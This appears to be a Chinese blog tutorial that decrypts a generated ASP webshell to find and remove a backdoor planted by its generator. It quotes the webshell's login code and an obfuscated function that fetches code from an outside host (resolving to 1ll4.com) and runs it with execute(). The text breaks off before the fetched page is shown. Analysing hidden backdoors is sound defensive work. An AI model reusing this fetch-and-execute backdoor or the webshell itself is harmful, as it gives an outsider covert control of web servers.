十三WEBSHELL终结版后门的去除过程+工具下载

自从上次从网上找了个WebShell管理网站，后来发现有后门， 被人挂马了，数据库被破坏了，至今还没修复……所以对别人的WebShell格外小心。网上找了个十三WEBSHELL终结版生成器,如图



下面我们来生成一个ASP WebShell,生成后的WebShell是加密的,这个解密直接用工具了，就不详述，解密后代码如图132.JPG
看看代码， 还是加密的,从代码中很容易可以看到他的解密函数是SinfoEn,那么我们就来解密出来，解密的代码已经有人写出来了。
下面是冰点极限论坛上贴出来的解密代码：

现在就直接解密，解密后的代码如133.jpg,按照普通的搜索后门的方法，当然是搜索如HTTP之类的代码，我搜索了一遍，没有发现可疑的代码。搜索关键子：UserPass,看看它的密码验证代码：

以下是引用片段： if session("web2a2dmin")<>UserPass then if request.form("pass")<>"" then if Serinf(request.form("pass"),pn)=UserPass then session("web2a2dmin")=UserPass response.redirect url else rrs"非法登录" end if else si="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><a href='"&SiteURL&"' target='_blank'>"&mname&"</a><hr><form action='"&url&"' method='post'>密码：<input name='pass' type='password' size='22'> <input type='submit' value='登录'></form><hr>"&Copyright&"</div> </center>" RRS sI end if response.end 密码用Serinf函数加密然后进行验证，代码正常，没有可疑的迹象我们在搜索Serinf，看到如下代码： if session("serinfo")=false then SererInf "1ll4":session("serinfo")=true else if action="getTerminalInfo" then SererInf "1ll4" end if end if

看到这里就觉得有点奇怪了，搜索session("serinfo")，可以发现session("serinfo") 在前面是没有定义的，那肯定是false了，那么我们就来看看SererInf()这个函数，搜索SererInf，找到如下代码：

以下是引用片段： function SererInf(inf) on error resume next Set theserver=Server.createobject(Sot(13,0)) theserver.open "GET",right(sot(13,0),4)&chr(60-pos)&"/"&chr(pos+45)&inf&chr(46)&mid(sot(4,0),2,1)&chr(109+pos)&right(Sot(6,0),1)&chr(47)&right(sot(1,0),1),false theserver.send() if theserver.readystate<>4 then exit function end if execute(theserver.responseText) set theserver=nothing if err.number<>0 then err.Clear end if end function

看到这里就很明白了，这就是后门，那么我们的后门到底是怎么样的呢？还是把下面这句解密开来看看

继续搜索sot，发现sot数组的值如下：

继续上查，可以看到pos=2，那么我们现在就可以把上面的这段用函数加密了的代码解密出来了，很简单。


看到这里是不是觉得很奇怪？怎么后门代码不完整呢？不急，我们再来打开http://1ll4.com/l这个网址看个究竟。打开http://1ll4.com/l页面，查看源文件，代码如下：